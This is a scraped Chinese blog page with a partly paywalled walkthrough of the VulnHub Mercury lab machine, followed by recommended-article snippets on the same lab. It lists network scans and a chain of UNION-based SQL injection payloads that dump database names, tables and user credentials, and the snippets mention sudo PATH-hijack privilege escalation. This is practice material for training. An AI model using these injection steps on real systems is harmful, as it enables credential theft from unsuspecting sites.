xing-vulnhub-mercury靶场#渗透测试

最新推荐文章于 2024-09-03 19:59:00 发布
原创 最新推荐文章于 2024-09-03 19:59:00 发布 · 1k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #数据库 #网络安全 #安全 #linux

kali:192.168.2.15

靶机:192.168.2.25

  1. 这个靶场需要修改网卡配置,网卡配置修改在网站连接有教程:vulnhub靶场——THE PLANETS: MERCURY_trinity.txt.bak-优快云博客
  2. netdiscover -r ip //扫描靶场主机ip
  3. namp -p- ip -a //查看靶场的详细信息
  4. 开放8080和22端口号---->http 8080然后找信息,发现404报错有个目录,进入目录,有一个目录存在漏洞----> 1 or 1=1 返回了所有信息----->尝试用1 order by 1来查看返回的字段,发现只有一个字段---->1 union all select database();使用这条sql语句来查询数据库名字---->1 union all select table_name from information_schema.tables where table_schema='mercury';使用sql语句来查询元数据库中mercury中的表名---->1 union all select column_name from information_schema.columns where table_schema='mercury' and table_name='users';查询这个users列中的内容--->1 union select group_concat(id,':',username,':',password) from mercury.users; 查看来自mercury库中users列中的id,username,password的内容

1 union select database(); //查询数据库

最低0.47元/天 解锁文章

200万优质内容无限畅学
Mercury 靶机 wp
m0_52496313的博客
10-08 544
Mercury 靶机 wp
vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 280
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
vulnhub靶场——THE PLANETS: MERCURY
Czheisenberg的博客
02-12 2840
vulnhub靶场——THE PLANETS: MERCURY
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Aluxian_的博客
07-09 1063
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.sqlmap基本使用这里就不讲了DC3有写或者别的文章也有讲,ssh-keygen得登入!3.漏洞得利用(漏洞很强大!4.(环境变量)提权得学习!
The Planets: Mercury
weixin_44770698的博客
01-06 611
靶场练习
红队打靶:THE PLANETS: MERCURY打靶思路详解(vulnhub
Bossfrank的博客
09-29 1644
本文是vulnhub靶机THE PLANETS: MERCURY的详细打靶过程。靶机不难,但体现了渗透的常见思维方式。打靶过程有一种按图索骥的感觉,非常有逻辑的思考。当我们目录爆破没什么思路的时候,可以在url中尝试错误的路径,尝试是否有报错的回显提示信息。特别关注url的信息,可能存在遍历和sql注入,此外,本文提权的思路与逻辑也需要读者深入理解。
mercury-playground:使用 Mercury 框架的测试项目
07-04
水星游乐场 与 Mercury 混在一起的测试项目 跑步 必需:NodeJS,Browserify ./setup.sh 安装使用的库 ./build.sh 创建 Javascript 包 ./run.sh 在上启动 Python HTTP 服务器
si-units:使用 Mercury 类型类的类型安全和功能性 SI 单位实现
07-01
"si-units"项目是一个专门针对SI(国际单位制)单位的库,它利用Mercury类型的类来确保类型安全,并提供了功能丰富的API以支持SI单位的计算和操作。这个库的设计目的是帮助开发者在处理与物理量相关的计算时避免常见...
Mercury性能测试报告-模板
03-05
Mercury性能测试报告-模板》是一份详细记录软件或系统在执行性能测试时的数据、分析及结论的文档。此报告通常用于评估系统的处理能力、稳定性、响应时间和资源利用率等关键性能指标。以下是对报告中可能包含的重要...
mercury-lang:解析Mercury代码并返回JSON格式的解析树的软件包
04-17
该程序包仅解析Mercury代码,并返回JSON格式的解析树。 它在环境中用于将代码转换为声音和视觉对象。 在将来的版本中,它将在基于浏览器的Mercury中使用。 :pager: 汞? Mercury是用于算法电子音乐的实时编码的一...
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Mercury_mercury 靶场
2401_84788430的博客
05-12 535
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新需要这份系统化的资料的朋友,可以戳这里获取渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103 开启了和端口老样子先访问,说还在开发中直接扫后台 扫到了一个进行访问,得到三个路径分别访问! 这里点进去我们可以
星球系列靶机Mercury
m0_74950307的博客
05-07 396
在靶机上的tmp目录下载了漏洞脚本后是一个zip文件,但是使用unzip不能解压,所以可以使用在本机解压后在进行压缩为tar,而且可以看到:存在一个8080端口的http服务,还有一个ssh,而且网址是使用py脚本编辑的。获得了靶机的IP:192.168.108.142。扫描到了robots.txt。然后就可以使用tar进行解压。
Vulnhud-行星系列:Mercury(水星)教学
最新发布
qq_73413340的博客
09-03 1278
靶机使用了arp做目标扫描发现目标地址是192.168.195.131,之后使用nmap对目标地址做了端口扫描发现目标主机开放了22端口、8080端口,站点探测发现没有什么有用的信息然后做了目录爆破但是没有什么收获接着利用报错信息发现一个目录接着在发现的目录中的Load fact链接发现了sql注入漏洞,接着利用sqmap使用脱库发现一个用户密码表并且存在明文,然后使用ssh远程登录了并且在当前文件发现了第一个flag然后在另一个文件夹中发现有一个txt文件,打开发现有两个账户跟密码经过base64解码得出
vulnhub靶机mercury
weixin_53665747的博客
07-17 189
靶机整体简单,没什么难度。
vulnhub-Mercury
yutianovo的博客
09-27 651
靶机描述 Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or
靶机渗透练习82-The Planets:Mercury
hirak0的博客
04-25 5394
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested o
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3885
vulnhub靶场——DarkHole 1 WriteUp
vulnhub-The Planets: Mercury
qq_43006864的博客
06-02 995
The Planets: Mercury ~ VulnHub靶机:攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集:nmap 192.168.1.1/24进一步探测端口信息nmap -sS -sV -A -p- 192.168.1.114访问一下8080端口,说是你好此网站目前正在开发中,请稍后再查看。随便访问一下错误页面。 给了三个提示。indexrobots.t
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2673
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
TP-LINK MERCURY FAST路由器密码查看工具使用指南
知识点详述: ... ... 二、TP-LINK MERCURY FAST 路由器密码查看工具的特点 本文所提及的路由器密码查看工具,特别标明支持TP-LINK、MERCURY和Fast等品牌家用路由器。这表明了该工具对特定品牌路由器配置文件的兼容性和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值